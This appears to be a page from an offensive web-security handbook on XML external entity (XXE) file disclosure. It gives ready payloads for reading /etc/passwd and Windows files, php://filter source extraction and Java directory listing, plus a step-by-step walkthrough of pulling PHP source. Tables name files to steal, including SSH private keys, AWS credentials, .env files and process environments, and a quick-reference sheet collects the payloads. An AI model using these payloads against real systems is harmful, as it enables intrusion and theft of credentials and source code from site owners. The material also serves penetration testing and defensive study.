File Disclosure
Once you’ve confirmed that external entity resolution works (see Identifying), file disclosure is a matter of template substitution. The first two paths depend on what the file contains; the third applies only to Java parsers:

    # Path 1 - file:// for plain-text files
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <root><name>&xxe;</name></root>

    # Path 2 - php://filter/ for files that contain XML-breaking characters
    # (source code with <, >, &) or binary content
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
    ]>
    <root><name>&xxe;</name></root>
    # → response contains base64; decode with `echo '...' | base64 -d`

    # Path 3 - Java directory listing
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/">]>
    <root><name>&xxe;</name></root>
    # → directory contents (Java parsers only)

Success indicator: response body contains the file’s contents (or its base64 encoding) where the entity was referenced.
Why two paths
XML has reserved characters: <, >, &, ", '. When an entity is expanded into XML content, those characters break the parse; < and & are the usual culprits because they start markup and entity references. The parser either:
- Errors out (no useful output)
- Silently truncates at the first reserved character
- Successfully renders the file because the file contains no reserved characters
/etc/passwd, /etc/hostname, log files, and plain-text configs typically work with raw file:// because they are plain ASCII with no <, >, or &. Source code, HTML, XML, config files with embedded shell, and any binary content break unless wrapped.
The wrapper of choice for PHP targets is php://filter/convert.base64-encode/ because base64 output is XML-safe by definition (alphanumeric + +, /, = - none are reserved). For non-PHP targets, the CDATA approach in Blind exfil is the alternative.
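
The choice between the two paths can be rehearsed offline against sample content. The following is a minimal sketch, not part of any tool: the function name `needs_wrapper` and the sample strings are hypothetical, and it assumes that only < and & (plus control bytes such as NUL) are what actually stop the parse.

```python
import base64

# Assumption: these two characters are what break expansion into XML content.
XML_BREAKING = set("<&")

def needs_wrapper(content: bytes) -> bool:
    """Return True if raw content is likely to break entity expansion."""
    has_markup = any(chr(b) in XML_BREAKING for b in content)
    # Control bytes other than tab, LF and CR are not legal XML characters.
    has_binary = any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in content)
    return has_markup or has_binary

passwd_line = b"root:x:0:0:root:/root:/bin/bash\n"
php_source = b"<?php echo 'a' . '&'; ?>\n"

print(needs_wrapper(passwd_line))                   # False
print(needs_wrapper(php_source))                    # True
print(needs_wrapper(base64.b64encode(php_source)))  # False
```

The last call shows why base64 is the default wrapper: its alphabet never produces a character that the check flags.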
Path 1 - plain-text file read
The textbook payload:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <root>
      <name>&xxe;</name>
    </root>

Response contains the file:

    <message>Thanks root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...</message>

Adapting to the target
The URL form is file:/// with three slashes: file: is the scheme, // introduces an (empty) host, and the third / is the root of the absolute path. Some parsers tolerate file:/etc/passwd (one slash), but the three-slash form is portable.
On Windows targets:

    <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
    <!ENTITY xxe SYSTEM "file:///c:/boot.ini">
    <!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">

Forward slashes work on Windows in file:// URIs. Backslashes work in some parsers but break in others; default to forward slashes.
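
The three-slash and forward-slash conventions can be applied mechanically. A small sketch under stated assumptions: `file_uri` is a hypothetical helper name, it expects an absolute path, and it does no percent-encoding.

```python
def file_uri(path: str) -> str:
    """Build a three-slash file:/// URI from an absolute Linux or Windows path."""
    # Normalise Windows backslashes to the portable forward-slash form.
    normalized = path.replace("\\", "/")
    # A drive-letter path (c:/...) needs a leading slash to become the URI path.
    if not normalized.startswith("/"):
        normalized = "/" + normalized
    return "file://" + normalized

print(file_uri("/etc/passwd"))           # file:///etc/passwd
print(file_uri(r"c:\windows\win.ini"))   # file:///c:/windows/win.ini
```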
Output is truncated at <, >, or &
If /etc/hostname returns fully but /etc/passwd returns only the first line, the parser is choking on something in the file. A quick diagnostic:

    # Check what the file actually contains at the suspected break point
    $ curl http://target/.../?file_disclosure | head -c 200
    # If it stops at a < or & character, that's the break

If the file has reserved characters, switch to Path 2.
Path 2 - php://filter wrapper for PHP targets
For PHP-backed apps, the php://filter/ wrapper lets the entity resolver apply a transformation before returning the content:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
    ]>
    <root>
      <name>&xxe;</name>
    </root>

Response contains base64:

    PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u

Decode:

    $ echo 'PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u' | base64 -d
    <?php
    include __DIR__ . '/config.php';
    ...

Wrapper anatomy

    php://filter/<filter-chain>/resource=<file-path>

The filter chain is convert.base64-encode for source-code extraction. Other useful filters:

| Filter | Effect | Use case |
|---|---|---|
| convert.base64-encode | Base64 the output | Anything with <, >, &, or binary content |
| convert.iconv.UTF-8.UTF-16 | Re-encode UTF-8 to UTF-16 | Sometimes survives where base64 doesn’t (rare) |
| zlib.deflate\|convert.base64-encode | Compress then base64 | Large files (chain with \|) |
| string.rot13 | ROT-13 | Curiosity; not generally useful |
Always start with convert.base64-encode - it’s the universal solution.
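
The wrapper anatomy is plain string assembly, which a short sketch makes concrete. `php_filter_uri` is a hypothetical helper name; the filter names are the ones from the table above, joined with | as described there.

```python
def php_filter_uri(resource: str, filters=("convert.base64-encode",)) -> str:
    """Assemble php://filter/<filter-chain>/resource=<file-path>."""
    chain = "|".join(filters)  # filters are applied left to right
    return f"php://filter/{chain}/resource={resource}"

print(php_filter_uri("/var/www/html/index.php"))
# php://filter/convert.base64-encode/resource=/var/www/html/index.php
print(php_filter_uri("index.php", ("zlib.deflate", "convert.base64-encode")))
# php://filter/zlib.deflate|convert.base64-encode/resource=index.php
```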
Path conventions
The resource= value is the path the PHP wrapper opens. Try in order:

| Path | When to use |
|---|---|
| Relative: resource=index.php | When the working directory is the webroot - most common |
| Absolute Linux: resource=/var/www/html/index.php | When relative paths fail or you’ve identified the webroot from prior recon |
| Absolute Windows: resource=c:/inetpub/wwwroot/index.php | Windows targets |
Some parsers refuse relative paths in the wrapper - start with absolute when you know the webroot, fall back to relative when you don’t.
Finding the webroot
Absolute paths require knowing the webroot. Ways to find it:

    <!-- Often the simplest disclosure -->
    <!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf">

    <!-- Or nginx -->
    <!ENTITY xxe SYSTEM "file:///etc/nginx/sites-enabled/default">

    <!-- Or via /proc/self -->
    <!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php">

/proc/self/cwd/ is a symlink to the process’s working directory; reading cwd/index.php reads the index.php of whatever directory the PHP-FPM worker has changed into. This sidesteps the “I don’t know where the webroot is” problem entirely on Linux. Apache vhost files (<VirtualHost> tags) and PHP source both contain <, so if a raw read comes back empty, wrap the same path with php://filter as in Path 2.
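
Once a vhost config has been retrieved, the webroot is the value of the DocumentRoot (Apache) or root (nginx) directive. A minimal sketch of pulling it out of the recovered text; `find_webroots` and the sample configs are hypothetical, and the pattern only covers the simple one-directive-per-line case.

```python
import re

# Matches "DocumentRoot /path" (Apache) and "root /path;" (nginx) at line start.
WEBROOT_RE = re.compile(
    r'^\s*(?:DocumentRoot|root)\s+"?([^";\s]+)"?\s*;?\s*$',
    re.MULTILINE | re.IGNORECASE,
)

def find_webroots(config_text: str) -> list[str]:
    """Return every webroot path declared in the config text."""
    return WEBROOT_RE.findall(config_text)

apache = "<VirtualHost *:80>\n    DocumentRoot /var/www/html\n</VirtualHost>\n"
nginx = "server {\n    root /srv/site;\n}\n"

print(find_webroots(apache))  # ['/var/www/html']
print(find_webroots(nginx))   # ['/srv/site']
```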
Path 3 - Java directory listing
Java’s XML parsers historically allowed pointing entities at directories, returning a directory listing rather than a file’s contents:

    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/">
    ]>
    <root><name>&xxe;</name></root>

Response:

    adduser.conf
    alternatives/
    apache2/
    apt/
    bash.bashrc
    ...

Useful when you don’t know what files exist on the system. Listing /, /etc/, /home/, and /var/www/ quickly maps interesting targets.
This only works on Java parsers (and some older non-PHP parsers). PHP returns an error or an empty result when handed a directory. If you’re on a PHP target, see Identifying for how to detect the framework.
High-value file targets
The catalog, organized by what you’re trying to accomplish:
Linux system reconnaissance

| File | Contents |
|---|---|
| /etc/passwd | Users (UIDs, home dirs, shells) |
| /etc/shadow | Password hashes (root-only; usually inaccessible) |
| /etc/hostname | Server hostname |
| /etc/hosts | Local DNS overrides |
| /etc/resolv.conf | DNS server config |
| /etc/os-release | Linux distribution |
| /etc/issue | Login banner - often shows distro |
| /proc/version | Kernel version |
| /proc/self/environ | Process environment variables - sometimes leaks credentials |
| /proc/self/cmdline | Process command line |
| /proc/self/cwd/ | Symlink to current working directory |
| /proc/self/fd/0, /proc/self/fd/1 | File descriptors (sometimes useful for log access) |
Web server config

| File | Contents |
|---|---|
| /etc/apache2/apache2.conf | Apache main config |
| /etc/apache2/sites-enabled/000-default.conf | Apache vhost config (reveals webroot) |
| /etc/nginx/nginx.conf | Nginx main config |
| /etc/nginx/sites-enabled/default | Nginx vhost config |
| /etc/php/<version>/apache2/php.ini | PHP config (reveals enabled modules, including expect) |
| /usr/local/etc/php/php.ini | Alternative PHP config path |
Application source code

| File | Likely path and contents |
|---|---|
| index.php | /var/www/html/index.php, /srv/www/index.php, /app/index.php |
| config.php, db.php, .env | Database credentials, API keys |
| wp-config.php (WordPress) | /var/www/html/wp-config.php - DB creds, secret keys |
| application.properties (Spring) | /opt/app/application.properties - DB creds |
| appsettings.json (.NET Core) | /var/www/app/appsettings.json |
| settings.py (Django) | /srv/django/myapp/settings.py - SECRET_KEY, DB |
| manage.py (Django) | Reveals project name |
Credentials and secrets

| File | Contents |
|---|---|
| /home/<user>/.ssh/id_rsa | SSH private key - direct lateral movement |
| /home/<user>/.ssh/authorized_keys | Confirms an account, lists trusted keys |
| /root/.ssh/id_rsa | Root SSH key (usually root-only) |
| /home/<user>/.bash_history | Command history - sometimes contains passwords typed inline |
| /home/<user>/.aws/credentials | AWS access keys |
| /home/<user>/.docker/config.json | Docker registry credentials |
| /var/lib/mysql/mysql.sock | MySQL socket - confirms MySQL running |
Windows targets

| File | Contents |
|---|---|
| c:/windows/win.ini | Tiny baseline file; proves Windows + file read |
| c:/windows/system.ini | System config |
| c:/boot.ini | Boot config (legacy) |
| c:/windows/system32/drivers/etc/hosts | Windows hosts file |
| c:/inetpub/wwwroot/web.config | IIS app config - DB connection strings, machine keys |
| c:/inetpub/logs/LogFiles/ | IIS logs (Java-style directory listing) |
| c:/Users/<user>/.ssh/id_rsa | SSH key if installed |
| c:/Windows/System32/config/SAM | Local account hashes (file is locked while Windows is running and needs SYSTEM privileges; usually blocked) |
Docker / container targets

| File | Contents |
|---|---|
| /.dockerenv | Presence proves you’re in a container |
| /proc/self/cgroup | Container ID and cgroup info |
| /etc/hostname | Container hostname (often randomized) |
| /.docker/config.json | Container registry credentials |
| Environment via /proc/self/environ | Often contains AWS creds, DB creds, app secrets |
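
/proc/self/environ separates its entries with NUL bytes, which are not legal XML characters, so it is usually read through the base64 wrapper and split afterwards. A sketch of that post-processing step; `parse_environ` is a hypothetical name and the sample variables are invented for illustration.

```python
import base64

def parse_environ(b64_text: str) -> dict[str, str]:
    """Decode a base64 copy of /proc/self/environ into a name/value mapping."""
    raw = base64.b64decode(b64_text)
    env = {}
    for entry in raw.split(b"\x00"):  # entries are NUL-separated
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

# Invented sample standing in for a reflected base64 response.
sample = base64.b64encode(b"PATH=/usr/bin\x00DB_HOST=db.internal\x00").decode()
print(parse_environ(sample))
# {'PATH': '/usr/bin', 'DB_HOST': 'db.internal'}
```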
Worked walkthrough - extracting index.php
Suppose you have an XXE on a PHP contact form and want the app’s source.
Attempt 1 - direct file://

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///var/www/html/index.php">
    ]>
    <root><name>&xxe;</name><email>x</email></root>

Response:

    Thanks

Empty. The <?php opening tag’s < character broke parsing. Switch to the wrapper.
Attempt 2 - php://filter

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
    ]>
    <root><name>&xxe;</name><email>x</email></root>

Response:

    Thanks PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=

Decode:

    $ echo 'PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=' | base64 -d
    <?php
    session_start();
    if (isset($_SESSION['uid'])) {
        header('Location: /profile.php');
        exit;
    }
    ...

The source code is now in hand. Repeat for every PHP file referenced by index.php (include / require statements give you the paths to enumerate next).
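
When the base64 is embedded in surrounding response text (here after "Thanks"), the decode step can be scripted instead of copy-pasted. A rough sketch: `decode_reflected` is a hypothetical helper, and it assumes the longest base64-looking run in the response is the entity expansion, which will not hold for every application.

```python
import base64
import re

def decode_reflected(response_text: str, min_len: int = 16) -> bytes:
    """Decode the longest base64-looking run found in a response body."""
    candidates = re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, response_text)
    if not candidates:
        raise ValueError("no base64 run found in response")
    longest = max(candidates, key=len)
    return base64.b64decode(longest)

# Response text reusing the base64 from the Path 2 example.
response = "Thanks PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u"
print(decode_reflected(response).decode())
```

If the reflected value sits directly against other alphanumeric text, the run will pick up extra characters and decoding may fail; in that case, slice the value out by its known position instead.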
Recursive source extraction
Once you have one file, look for include, require, include_once, require_once statements. Each names another file:

    include 'config.php';
    require_once __DIR__ . '/db.php';
    include('/var/www/html/lib/auth.php');

Loop: for each include/require, run the same XXE against the named file. After 3-5 iterations you’ve usually got the entire source tree.
For automation, see Automation - XXEinjector can mass-extract.
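
The include-following loop starts with pulling paths out of the decoded source. The sketch below is an illustration only, not how XXEinjector works: `included_paths` is a hypothetical helper, it handles only string-literal targets (optionally prefixed with `__DIR__ .`), and it assumes the extracted file lives in `base_dir`.

```python
import posixpath
import re

# include/require(_once), optional parenthesis, optional __DIR__ prefix, quoted path.
INCLUDE_RE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*(__DIR__\s*\.\s*)?['"]([^'"]+)['"]"""
)

def included_paths(php_source: str, base_dir: str) -> list[str]:
    """Return absolute paths for the files named by include/require statements."""
    paths = []
    for dir_prefix, target in INCLUDE_RE.findall(php_source):
        if dir_prefix:
            # __DIR__ . '/db.php' is relative to the file's own directory.
            target = target.lstrip("/")
        # posixpath.join keeps target unchanged when it is already absolute.
        paths.append(posixpath.normpath(posixpath.join(base_dir, target)))
    return paths

source = """include 'config.php';
require_once __DIR__ . '/db.php';
include('/var/www/html/lib/auth.php');
"""
print(included_paths(source, "/var/www/html"))
# ['/var/www/html/config.php', '/var/www/html/db.php', '/var/www/html/lib/auth.php']
```

Includes built from variables or function calls are skipped by this pattern and still need a manual read of the source.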
Edge cases
File too large
Some parsers truncate entity content after a fixed size (libxml2 has a default limit of about 10 MB). Large log files or binaries may come back partial. Workarounds:
- Filters that only transform content, such as php://filter/read=string.toupper/resource=..., don’t help with size; you’d have to read by offset
- Use multiple chained entities for offset reading - complex; usually easier to find a smaller file
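
The filter table lists zlib.deflate|convert.base64-encode for large files; output read that way has to be inflated after the base64 decode. A sketch of that step, with `inflate_b64` as a hypothetical name. It assumes the filter emits raw deflate data without a zlib header, which is why `wbits=-15` is used; if decompression fails, that assumption is the first thing to revisit.

```python
import base64
import zlib

def inflate_b64(b64_text: str) -> bytes:
    """Base64-decode, then inflate raw deflate data (assumed: no zlib header)."""
    compressed = base64.b64decode(b64_text)
    return zlib.decompress(compressed, wbits=-15)

# Simulate the target side locally: raw deflate, then base64.
compressor = zlib.compressobj(wbits=-15)
payload = compressor.compress(b"log line\n" * 1000) + compressor.flush()
sample = base64.b64encode(payload).decode()

print(len(sample), "base64 chars for", len(inflate_b64(sample)), "bytes of content")
```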
Permission errors
Reading /etc/shadow typically fails because the PHP-FPM user isn’t root. The error response varies:
- Empty content (parser silently failed)
- HTTP 500 with stack trace
- Original response with empty entity expansion
/etc/shadow is essentially never readable via XXE on a well-configured system. Move on to /home/<user>/.ssh/id_rsa for the same kind of payoff.
Path with special characters

    <!ENTITY xxe SYSTEM "file:///path/with spaces/file.txt">

Spaces in paths sometimes need URL-encoding:

    <!ENTITY xxe SYSTEM "file:///path/with%20spaces/file.txt">

Either may work depending on the parser. Try unencoded first; URL-encode if it fails.
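
The "unencoded first, then encoded" order can be generated rather than typed by hand. A minimal sketch using the standard library's `urllib.parse.quote`; `uri_variants` is a hypothetical helper name.

```python
from urllib.parse import quote

def uri_variants(path: str) -> list[str]:
    """Return the file:// URIs to try, unencoded first, percent-encoded second."""
    raw = "file://" + path
    # Keep / and : literal so path separators and drive letters survive.
    encoded = "file://" + quote(path, safe="/:")
    return [raw] if raw == encoded else [raw, encoded]

print(uri_variants("/path/with spaces/file.txt"))
# ['file:///path/with spaces/file.txt', 'file:///path/with%20spaces/file.txt']
print(uri_variants("/etc/passwd"))
# ['file:///etc/passwd']
```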
Encoding mismatch
The response is gibberish even though the file should be plain text. Possibilities:
- File is UTF-16 or another encoding; specify it in the XML declaration, <?xml version="1.0" encoding="UTF-16"?> - rarely needed for Linux text files
- Parser is wrapping the output in an unexpected encoding; try convert.base64-encode and decode manually
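
After a manual base64 decode, the byte-order mark is a quick way to tell which encoding the file was in. A small sketch under stated assumptions: `decode_text` is a hypothetical helper, it only recognises UTF-8 and UTF-16 BOMs, and it falls back to UTF-8 with replacement characters otherwise.

```python
import codecs

# BOM prefix -> Python codec that consumes that BOM while decoding.
BOMS = [
    (codecs.BOM_UTF8, "utf-8-sig"),
    (codecs.BOM_UTF16_LE, "utf-16"),
    (codecs.BOM_UTF16_BE, "utf-16"),
]

def decode_text(raw: bytes) -> str:
    """Decode bytes using the BOM if present, else assume UTF-8."""
    for bom, encoding in BOMS:
        if raw.startswith(bom):
            return raw.decode(encoding)
    return raw.decode("utf-8", errors="replace")

sample = "hostname\n".encode("utf-16")  # Python prepends a BOM for this codec
print(repr(decode_text(sample)))        # 'hostname\n'
print(repr(decode_text(b"plain\n")))    # 'plain\n'
```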
Quick reference

| Task | Payload |
|---|---|
| Plain text file | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| PHP source code | <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> |
| Windows file | <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> |
| Java directory listing | <!ENTITY xxe SYSTEM "file:///etc/"> |
| Find current webroot | <!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php"> (Linux only) |
| Read SSH key | <!ENTITY xxe SYSTEM "file:///home/USERNAME/.ssh/id_rsa"> |
| Read process environment | <!ENTITY xxe SYSTEM "file:///proc/self/environ"> |
| Read Apache vhost | <!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf"> |
| Read .env (Laravel, generic) | <!ENTITY xxe SYSTEM "file:///var/www/html/.env"> |
| Decode base64 response | echo 'BASE64' \| base64 -d |
| If content truncates at < | Switch to php://filter/convert.base64-encode/ |
| If non-PHP target | See Blind exfil for CDATA wrap |
| If no reflection | See Blind exfil for OOB exfil |
| Recursive source extraction | Find include/require in extracted source; loop on named files |
For attacks beyond file read (SSRF, RCE via expect, DoS), see RCE and SSRF. For the blind variants when no response reflection is available, see Blind exfil.